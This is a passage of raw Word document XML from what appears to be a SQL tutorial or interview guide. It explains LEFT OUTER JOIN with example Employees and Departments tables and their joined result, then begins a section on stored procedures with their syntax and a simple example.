      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>LEFT OUTER JOIN</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (often just referred to as </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>LEFT JOIN</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) is a type of SQL join that returns all records from the </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>left table</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (the first table listed in the query) and the matching records from the </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>right table</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (the second table listed in the query). If there is no match found in the right table, the result will contain </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>NULL values</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for columns from the right table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="047E7BA8"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Key Points:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035A84F2"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The </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>LEFT OUTER JOIN</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ensures that </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>all rows from the left table</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are returned, even if there is no match in the right table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42AAF222"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If there is a match, the corresponding row from the right table will be included in the result set.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3317E15D"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If there is no match, </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>NULL values</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> will be returned for the columns of the right table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362D6C8D"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yntax:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07AA26CE"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SELECT columns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="259F6E8D"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FROM left_table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7060D629"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LEFT OUTER JOIN right_table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E04D2E9"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ON left_table.column_name = right_table.column_name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1C23C4"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ample:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1494D7FE"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Consider the following tables:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2EF12F"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Employees</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</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765"/>
        <w:gridCol w:w="1094"/>
        <w:gridCol w:w="1451"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BD197A" w:rsidRPr="005C1C9E" w14:paraId="75C93E17" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7CE75D9B"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p_id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="52FEF2BA"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p_name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="19B2A74F"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department_id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BD197A" w:rsidRPr="005C1C9E" w14:paraId="35285A3D" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="445FE1A1"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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2D5FBF45"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Alice</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4D39957A"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10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BD197A" w:rsidRPr="005C1C9E" w14:paraId="045BBFD3" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="681AA5BB"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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6154F363"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Bob</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="130A11DB"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20</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BD197A" w:rsidRPr="005C1C9E" w14:paraId="750D12F0" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4EDABD25"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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="389716D3"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Charlie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1753631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30</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="119C7A20"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Departments</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</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1451"/>
        <w:gridCol w:w="1795"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BD197A" w:rsidRPr="005C1C9E" w14:paraId="656052AA" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3B05D7B2"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department_id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A3098BC"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department_name</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BD197A" w:rsidRPr="005C1C9E" w14:paraId="6420A1D7" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3B5032F4"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10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0EBF836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HR</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BD197A" w:rsidRPr="005C1C9E" w14:paraId="2D1A33FC" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="52EDA160"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20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0154CBC7"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IT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="61492835"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We want to retrieve all employees and the departments they belong to.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E98608B"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Query:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46BC8A37"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SELECT e.emp_name, d.department_name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0F3207"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FROM Employees e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43FF0C69"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LEFT OUTER JOIN Departments d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A8BF821"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ON e.department_id = d.department_id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56BAD79D"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Resul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9"/>
        <w:gridCol w:w="1795"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BD197A" w:rsidRPr="005C1C9E" w14:paraId="27F63DB1" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="58EE82C4"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p_name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="511B8626"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department_name</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BD197A" w:rsidRPr="005C1C9E" w14:paraId="6C1D2EC5" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2CA979A2"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Alice</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7CABF684"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HR</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BD197A" w:rsidRPr="005C1C9E" w14:paraId="635DF55A" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="36982F7B"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Bob</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="07625B87"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IT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BD197A" w:rsidRPr="005C1C9E" w14:paraId="7E33F118" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="269A571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lastRenderedPageBreak/>
              <w:t>Charlie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0A0BB539"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NULL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="29B51810"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planation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2368D87C"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Alice</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Bob</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> have matching department IDs in the Departments table, so their department names are returned.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0845C925"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Charlie</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> does not have a matching department ID in the Departments table, so the department_name is returned as </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>NULL</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7842377A"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Use Cases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F573583"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Data integrity</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When you want to ensure that all records from the left table are returned, even if there's no corresponding record in the right table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FACB588"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Handling missing data</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Useful when working with optional relationships, where some records in the left table might not have related records in the right table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F65CF0" w14:textId="02945096"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2CDF0374">
          <v:rect id="_x0000_i3035" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="242F0A39" w14:textId="795CBA7C" w:rsidR="00380657" w:rsidRPr="00CE4B95" w:rsidRDefault="00356F93">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="740" w:name="_Toc196308220"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">What is </w:t>
      </w:r>
      <w:r w:rsidR="00BD197A" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Stored Procedure? What is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>the use of stored procedure</w:t>
      </w:r>
      <w:r w:rsidR="00380657" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="740"/>
    </w:p>
    <w:p w14:paraId="3CF04F02" w14:textId="4B5B0982" w:rsidR="00BD197A" w:rsidRPr="005C1C9E" w:rsidRDefault="00BD197A" w:rsidP="005C1C9E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>What is a Stored Procedure?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A13C9C1"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A </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Stored Procedure</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a precompiled collection of one or more SQL statements that can be executed as a single unit. It is stored in the database and can be called or invoked from applications or other SQL statements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142FDCA3"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Stored procedures allow you to encapsulate complex logic and can take inputs, perform operations, and return results. They are typically written in SQL, although many database systems support procedural extensions, such as PL/SQL in Oracle or T-SQL in SQL Server, which allow for procedural programming features like loops, conditions, and variables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3025CC"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Key Characteristics of Stored Procedures:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5126A8A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Encapsulated SQL Logic</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: They group multiple SQL queries together to perform a specific task.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5320C238"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Input and Output</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: They can accept input parameters and return output parameters or results.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC7B6FC"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Precompiled</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The procedure is precompiled and stored in the database, improving performance for repeated executions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC3B6D1"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Reusable</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: They can be executed multiple times, making them useful for repetitive tasks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51493E8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Transaction Control</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Stored procedures can handle transactions, meaning they can commit or roll back changes based on specific logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F08947"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yntax (Basic Structure):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03CF202B"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CREATE PROCEDURE procedure_name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C11CE04"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parameter1 datatype, parameter2 datatype, ...]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1219495C"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AS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2017C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BEGIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D3D0077"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 SQL statements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6847A0AE"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SELECT * FROM table_name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EEC300B"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UPDATE table_name SET column = value;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65FBE0FF"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 More SQL operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF3900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END;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE8F38C"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ample:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD412A2"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Here’s a simple stored procedure that retrieves employees in a specific department:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15DBA35A"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CREATE PROCEDURE GetEmployeesByDepartment (IN dept_id INT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261666A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BEGIN</w:t>
      </w:r>
    </w:p>
